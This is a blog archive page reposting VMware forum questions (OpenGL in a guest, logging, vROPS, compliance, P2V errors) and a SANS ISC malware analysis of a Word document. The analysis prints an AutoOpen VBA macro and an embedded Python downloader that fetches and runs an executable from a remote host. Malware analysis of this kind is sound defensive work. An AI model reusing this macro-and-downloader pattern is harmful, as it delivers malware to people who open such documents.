All posts by David

OpenGL 4.1 support on Linux Guest using Workstation PRO 16

This post was originally published on this site

I’ve see in the release notes (VMware Workstation 16 Pro Release Notes) this line:

Support for DirectX 11 and OpenGL 4.1 in the Guest

I’ve installed Ubuntu 20.04 guest on Windows 10 host and OpenGL 3.3 version is reported. I’ve updated Mesa drivers to latest version (20.1.8) and the same OpenGL version is reported:

glxinfo -B

name of display: :0

display: :0  screen: 0

direct rendering: Yes

Extended renderer info (GLX_MESA_query_renderer):

    Vendor: VMware, Inc. (0x15ad)

    Device: SVGA3D; build: RELEASE;  LLVM; (0x405)

    Version: 20.1.8

    Accelerated: no

    Video memory: 1MB

    Unified memory: no

    Preferred profile: core (0x1)

    Max core profile version: 3.3

    Max compat profile version: 3.3

    Max GLES1 profile version: 1.1

    Max GLES[23] profile version: 2.0

OpenGL vendor string: VMware, Inc.

OpenGL renderer string: SVGA3D; build: RELEASE;  LLVM;

OpenGL core profile version string: 3.3 (Core Profile) Mesa 20.1.8 – kisak-mesa PPA

OpenGL core profile shading language version string: 3.30

OpenGL core profile context flags: (none)

OpenGL core profile profile mask: core profile



OpenGL version string: 3.3 (Compatibility Profile) Mesa 20.1.8 – kisak-mesa PPA

OpenGL shading language version string: 3.30

OpenGL context flags: (none)

OpenGL profile mask: compatibility profile



OpenGL ES profile version string: OpenGL ES 2.0 Mesa 20.1.8 – kisak-mesa PPA

OpenGL ES profile shading language version string: OpenGL ES GLSL ES 1.0.16

Can you please let me know how may I get OpenGL 4.1 support?


PS: I’ve also tried this guide to build vmwgfx, but it seems outdated.
The error message is: ERROR: Problem encountered: swrast vulkan requires gallium swrast

How to disable all logging in the new version 16

This post was originally published on this site

I am new here sorry if this has been asked before, I couldn’t find results,


The old method described in is not working any more in the new version 16


Now a new excusable will be execute the command C:Program Files (x86)VMwareVMware Playerx64mksSandbox.exe” –logFile x:xxxmksSandbox.log to load the VM


And if Is there any way to disable the UI logs as well please,


I hope some one can help,



VROPS – Overload CPU for a cluster

This post was originally published on this site



I can see in vROPS that one of my cluster has the following stats:


CPU cores = 252

vCPU allocated = 3181

Overload CPU = 12,62


My customer ask me to explain this value of overload CPU but I don’t really know what to say about it especialy when should I consider it becomes a warning for my cluster?

This one is clearly in CPU contention during the day.

I have another one that is not in CPU contention and has the following values:


CPU cores = 48

vCPU allocated = 192

Overload CPU = 4


Is is too simple to answer that above 10% overload, it is not good? I imagine that it is more complicated than that.


Thanks for helping.



macOS compliance profile marks everything als false

This post was originally published on this site

Hi, I am running a trial of vmware workspace one uem.
Version: (2008)
Build Information:


I have an issue where all my macOS compliance checks are being reported as false, while they are in fact not on two macOS 10.15.6 laptops.

Checks in question: – Disk Encryption is not encryptedSystem Integrity Protection is disabledOS Version less than or equal to macOS Catalina 10.15.6.

The devices in question have already rebooted and I have re-requested compliance check numerous times.

e.g. I verified SIP is indeed enabled by issuing `csrutil status` via commandline which reported ‘enabled’.

This all worked fine a couple days ago.


Can somebody please help out?

I have passed VCAP-DCV Deploy 3v0-21.18

This post was originally published on this site

I have 8 years of VMware experience. In April this year, I plan to take the EXAM of VCAP. In June, I completed the exam of VCAP-Design.


VCAP-DCV Deploy Examination Experience:


2020/07/29 Failed the first exam


Before that, I had completed a lot of study and work. The test environment was based on vSphere 6.7, so many details may be good. When I saw the exam topics, I was a little confused and had many questions, such as QOS and Lun MASK, which were rarely used.

It also made me realize my shortcomings.


Prior to this, I completed the online lab provided by the user, which is a great lab, the lab is in Brazil (time zone UTC-3), pay attention to the time conversion, you can reserve it for $15.

Tip: You need a paypal account.


2020/09/15 The second exam, pass


Based on the first failure, I quickly realized my knowledge blind spot.

At the same time, I built my own vSphere 6.5 test platform in the nested environment, completing the construction of many functions.

With all 17 questions completed, the test evaluation feels like a script grading, so pay attention and do as much as you can on each item of each question.



That night I received the test result of 371/500, and I passed, but with a lower score than I had expected.


For more test tips, visit my blog!

VMware VCAP-DCV Deploy 3V0-21.18考试提示 – 小岑博客


消息编辑者为:cen xuebo

P2V Conversion Failed

This post was originally published on this site

The first time conversion was failed with .vstor2-mntapi20-shared-4B1CBA2200001000000000001A000000$Reconfig$”,


After that followed the below steps:

  -You should check source & destination processor, memory availability

-Check Password case sensitive before converting to virtual (if any  !@#$%^&*() is there then remove it),if it’s there then reset it before proceeding

– Uninstall Symantec Endpoint Protection from physical server.

– Run chkdsk /R in a command prompt window from source physical server

– Re-boot the Windows 2003 machine (so that Windows can find and fix any disk sectors).

– Then use VM Converter to convert the machine.


The second time the conversion failed with A general system error occurred:Internal Error.


Kindly suggest how to resolve this issue.


Worker diagnostics traces are below:


2020-09-09T00:36:18.432+05:30 error vmware-converter-agent[04656] [Originator@6876 sub=task-1] BlockLevelVolumeCloneMgr::CloneVolume: failed with exception BlockLevelVolumeCloneMgr::CloneVolume: Detected a write error during the cloning of volume WindowsBitmapDriverVolumeId=[4B-1C-BA-22-00-E6-9E-73-07-00-00-00]. Error: 1520435345 (type: 1, code: 95027209)

REST calls to vRealize Operations Manager does character “translation”

This post was originally published on this site



I need to do an API call to vRealize Operations Manager from vRealize Orchestrator.

And I use the workflow “Invoke a REST operation”


Basically I need to have following URL:



But the Invoke a REST operation “translates” it to this:



Anyone suggestions ?



A Mix of Python & VBA in a Malicious Word Document, (Fri, Sep 18th)

This post was originally published on this site

A few days ago, Didier wrote an interesting diary about embedded objects into an Office document[1]. I had a discussion about an interesting OLE file that I found. Because it used the same technique, I let Didier publish his diary first. Now, let’s have a look at the document.

It’s an OLE file that contains an embedded object:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oleObject1.bin
  1:        76 'x01CompObj'
  2: O     471 'x01Ole10Native'
  3:         6 'x03ObjInfo'
$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oleObject1.bin -s 2 -d
?pJIkdw.pyC:UsersCNIyiDesktoppJIkdw.py7C:UsersCNIyiAppDataLocalTemppJIkdw (2).pyr
import socket
import tempfile
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 8080))
buf = ""
while True:
  data = s.recv(1024)
  if data:
    buf += data
temp = tempfile.gettempdir() + "" + "JcNrGlx.exe"
f = open(temp, "wb")
f = None

The code is easy to understand: It connects to, fetches a malicious PE file, dumps it on disk, and executes it. Note the private IP address used (RFC1918). It should be a test file (or from a red-team exercise?). The file hash is 40ae709cb1d6335c3a41863d2dca21bfa7bd493ebb3d7ddd72da4e09b09b2988 with a VT score of 5/60[2]. I searched via VT for more information about this file and found the document where it was coming from. 

It’s a Word document (9f40fd5596a5d9f195017a5cae09799af8755f1436b8b9edbed768ccaa5dba67) with a VT score of 8/63[3]. The file contains indeed our original OLE file as reported by

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite malicious.docx
A: word/vbaProject.bin
 A1:       348 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    1327 'VBA/NewMacros'
 A4: m     924 'VBA/ThisDocument'
 A5:      2649 'VBA/_VBA_PROJECT'
 A6:      1082 'VBA/__SRP_0'
 A7:       104 'VBA/__SRP_1'
 A8:        84 'VBA/__SRP_2'
 A9:       107 'VBA/__SRP_3'
A10:       570 'VBA/dir'
B: word/embeddings/oleObject1.bin
 B1:        76 'x01CompObj'
 B2: O     471 'x01Ole10Native'
 B3:         6 'x03ObjInfo'

The macro in stream 3 is very simple:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite malicious.docx -s 3 -v
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
' AutoOpen Macro
    ActiveDocument.Shapes("Object 2").Select
    Selection.ShapeRange(1).OLEFormat.DoVerb VerbIndex:=wdOLEVerbPrimary
End Sub

The method (OLEFormat.DoVerb) requests an OLE object to perform the verb passed as argment[4]. ‘wdOLEVerbPrimary’ means to perform the verb that is invoked when the user double-clicks the object. The code will be executed only if Python is available on the targeted host.

The Word document seems corrupted and doesn’t open properly in my sandbox. But looking at the files inside the zip archive, you discover that the OLE file is indeed embedded:

<Relationship Id="rId7" Type="" Target="embeddings/oleObject1.bin"/>


<o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/>

Yesterday, I found new occurrences of the same OLE file but trying to connect to other IP addresses:

  • %%ip:

Interestingly, the last IP address (the routable one) belongs to (United States Courts)! The purpose of the file is still unclear but, being based on a Python payload, I presume the victim is targeted. Or, as I already did in the past, I spotted a red-team exercise preparation?


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Workstation 16 “Could not open /dev/vmmon” on OpenSUSE Leap 15.2 using secure boot

This post was originally published on this site

I just upgraded to VMWare Workstation 16.  The program install without any problems.  However, when I try to load a virtual machine, I get the following error Messages:



Could not open /dev/vmmon: No such file or directory.

Please make sure that the kernel module `vmmon’ is loaded.



Failed to initialize monitor device.



Unable to change virtual machine power state: Transport (VMDB) error -14: Pipe connection has been broken.


I did a search on the Internet and found the following tutorial to fix this problem:  VMware Knowledge Base


The problem is that the tutorial does not work on openSUSE Leap 15.2 because there seems not to exist a ‘linux-headers’ command. 


Does anyone know a possible fix that works on openSUSE Leap 15.2?